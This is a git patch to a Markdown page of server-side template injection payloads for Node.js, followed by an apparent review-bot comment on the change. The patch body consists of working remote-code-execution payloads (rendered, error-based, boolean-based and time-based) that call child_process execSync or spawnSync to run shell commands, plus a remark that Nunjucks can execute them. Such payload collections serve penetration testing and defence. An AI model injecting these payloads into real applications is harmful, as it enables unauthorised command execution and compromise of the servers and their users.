From bec6524774724cbe859f0aab1f24491961f9e520 Mon Sep 17 00:00:00 2001 From: vladko312 Date: Sat, 3 Jan 2026 23:19:26 +0300 Subject: [PATCH] SSTI: - Fixed NodeJS payloads --- Server Side Template Injection/JavaScript.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Server Side Template Injection/JavaScript.md b/Server Side Template Injection/JavaScript.md index 4568a71..8e8d861 100644 --- a/Server Side Template Injection/JavaScript.md +++ b/Server Side Template Injection/JavaScript.md @@ -41,17 +41,17 @@ To use these payloads, wrap them in the appropriate tag. ```javascript // Rendered RCE -global.process.mainModule.require("child_process").execSync("id") +global.process.mainModule.require("child_process").execSync("id").toString() // Error-Based RCE -global.process.mainModule.require("Y:/A:/"+global.process.mainModule.require("child_process").execSync("id")) -""["x"][global.process.mainModule.require("child_process").execSync("id")] +global.process.mainModule.require("Y:/A:/"+global.process.mainModule.require("child_process").execSync("id").toString()) +""["x"][global.process.mainModule.require("child_process").execSync("id").toString()] // Boolean-Based RCE [""][0 + !(global.process.mainModule.require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"] // Time-Based RCE -global.process.mainModule.require("child_process").execSync("id && sleep 5") +global.process.mainModule.require("child_process").execSync("id && sleep 5").toString() ``` NunjucksJS is also capable of executing these payloads using `{{range.constructor(' ... ')()}}`.
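Review bot: the four changed `execSync("id")` lines (Rendered, both Error-Based, and Time-Based) gain `.toString()`, but neither the commit message ("Fixed NodeJS payloads") nor the code block says what was broken without it. Add a one-line comment at the top of the block, or a sentence in the commit message, stating why the conversion is needed, so that readers of JavaScript.md can tell when it matters. The Time-Based line also receives `.toString()` although its label says the signal is the delay rather than the output; either explain why it is needed there or leave that line unchanged to keep the diff minimal.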